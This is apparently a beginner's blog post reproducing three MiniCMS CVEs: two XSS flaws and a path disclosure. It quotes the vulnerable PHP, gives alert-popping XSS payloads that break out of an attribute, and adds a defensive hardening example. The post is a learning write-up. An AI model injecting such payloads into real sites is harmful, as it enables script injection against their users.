MiniCMS Vulnerability Reproduction (1)

Introduction

MiniCMS is a tiny CMS designed for personal websites. Its features are:

  1. No database is required, just a web environment that can run PHP.
  2. Designed only for personal websites, with no complex member management or permission settings.
  3. There are no categories, only tags, so you never have to agonize over how to classify articles.
  4. There are only “articles” and “pages”, no “comments”, “plugins” or “themes”, so you can focus on creating content.

Project address: github.com/bg5sbk/Mini…

CVE reproduction

MiniCMS is small enough to be a good first target for learning code auditing.

As a security newbie, I followed Master HACHp1’s CVE summary to reproduce the vulnerabilities.

CVE-2018-1000638 Reflected XSS

File: /minicms-master/mc-admin/page.php: reflected XSS

Locate where the parameter is read:

```php
if (isset($_GET['date']))
  $filter_date = $_GET['date'];
else
  $filter_date = '';
```

The date parameter is taken from GET and echoed directly into the HTML output without any filtering, and this happens in more than one place:

```php
<span class="pager">A total of <?php echo $page_count; ?> item&nbsp;&nbsp;
    <a class="link_button" href="?state=...&date=<?php echo $filter_date; ?>">&laquo;</a>
    <a class="link_button" href="?state=...&date=<?php echo $filter_date; ?>&page=...">&lsaquo;</a><input type="text" value="..." id="page_input_1"/>Page, a total of <?php echo $last_page; ?> page<a class="link_button" href="?state=...&date=<?php echo $filter_date; ?>&page=...">&rsaquo;</a>
    <a class="link_button" href="?state=...&date=<?php echo $filter_date; ?>&page=...">&raquo;</a>
  </span>
```

The value lands inside an href attribute, so a payload that closes the quote and the tag triggers the XSS:

```
?date="></a><img%20src=1%20onerror=alert(1)><a>
```

Effect:

CVE-2018-10227 Stored XSS

File: /minicms-master/mc-admin/conf.php: stored XSS in the site address setting. The XSS payload is saved directly to the configuration file.

```php
if (isset($_POST['save'])) {
  $user_name_changed = $_POST['user_name'] != $mc_config['user_name'];

  $mc_config['site_name'] = $_POST['site_name'];
  $mc_config['site_desc'] = $_POST['site_desc'];
  $mc_config['site_link'] = $_POST['site_link'];   // stored with no validation or escaping
  $mc_config['user_nick'] = $_POST['user_nick'];
  $mc_config['user_name'] = $_POST['user_name'];
  $mc_config['comment_code'] = get_magic_quotes_gpc() ? stripslashes(trim($_POST['comment_code'])) : trim($_POST['comment_code']);

  if ($_POST['user_pass'] != '')
    $mc_config['user_pass'] = $_POST['user_pass'];
  $code = "<?php\n\$mc_config=".var_export($mc_config, true)."\n?>";

  file_put_contents('../mc-files/mc-conf.php', $code);
}
```

Settings submitted through conf.php are written straight into mc-conf.php with no filtering of the site_link parameter. The settings form itself does escape the value when it redisplays it:

```php
<div class="field">
      <div class="label">Web site address</div>
      <input class="textbox" type="text" name="site_link" value="<?php echo htmlspecialchars($mc_config['site_link']); ?>" />
      <div class="info"></div>
    </div>
```

In head.php, however, htmlspecialchars is not applied: $mc_config['site_link'] is output to the front end as-is, so the stored value executes on every page that includes the header.

Constructed payload for the site address field:

```
http://localhost/MiniCMS"></a><img src=1 onerror=alert(1)><a>
```

Effect:

CVE-2018-10424 Physical path disclosure

File: /minicms-master/mc-admin/post-edit.php

```php
} else if (isset($_GET['id'])) {
  $file_path = '../mc-files/posts/data/'.$_GET['id'].'.dat';   // id is used in the path unchecked

  $data = unserialize(file_get_contents($file_path));           // no existence check before the read

  $post_id      = $data['id'];
  $post_state   = $data['state'];
  $post_title   = $data['title'];
  $post_content = $data['content'];
  $post_tags    = $data['tags'];
  $post_date    = $data['date'];
  $post_time    = $data['time'];
  $post_can_comment = isset($data['can_comment']) ? $data['can_comment'] : '1';
}
```

If the supplied id does not exist, the failed file read raises a PHP warning that is displayed to the user, and that warning contains the script’s absolute path on the server, disclosing the physical path of the installation.
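As an added hardening example (not MiniCMS code), the following PHP shows the defensive pattern that addresses all three findings above: escape every value on output, allow-list the date and id parameters, and check that the post file exists before reading it so a missing post never produces a path-revealing warning. The helper names, the YYYY-MM date format and the alphanumeric post-id format are assumptions.

```php
<?php
// Added hardening example for the three MiniCMS findings above; not MiniCMS code.
// Helper names, the YYYY-MM date format and the post-id format are assumptions.

// Escape a value before echoing it into HTML. ENT_QUOTES also encodes the double
// quote, which is the character both XSS payloads use to break out of an attribute.
function h($value): string {
    return htmlspecialchars((string)$value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Allow-list the date filter before it is echoed back into the pager links.
function filter_date_param(array $get): string {
    $date = $get['date'] ?? '';
    return preg_match('/^\d{4}-\d{2}$/', $date) ? $date : '';
}

// Accept a site link only if it is an http(s) URL made of URL-safe characters;
// the stored value must still go through h() when head.php prints it.
function validate_site_link(string $link): ?string {
    if (!preg_match('/^https?:\/\/[A-Za-z0-9\-._~:\/?#\[\]@!$&\'()*+,;=%]+$/', $link)) {
        return null;                       // rejects quotes, angle brackets and spaces
    }
    return filter_var($link, FILTER_VALIDATE_URL) !== false ? $link : null;
}

// Resolve a post id to its data file without letting a failed read print a path.
function post_data_path(string $id, string $dataDir): ?string {
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $id)) {
        return null;                       // no traversal characters reach the path
    }
    $path = $dataDir . '/' . $id . '.dat';
    return is_file($path) ? $path : null;  // caller shows a generic "post not found"
}

// Demonstration with constructed inputs taken from the payloads on this page.
$reflected = ['date' => '"></a><img src=1 onerror=alert(1)><a>'];
var_dump(filter_date_param($reflected));   // rejected: not a YYYY-MM value
echo h($reflected['date']), "\n";          // quotes and brackets entity-encoded, inert
var_dump(validate_site_link('http://localhost/MiniCMS"></a><img src=1 onerror=alert(1)><a>'));
var_dump(validate_site_link('http://localhost/MiniCMS'));
var_dump(post_data_path('../../mc-conf', __DIR__ . '/mc-files/posts/data'));  // rejected, no warning
```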

Afterword

My name is W4ngch3n. This is my first blog post, so please feel free to give me advice~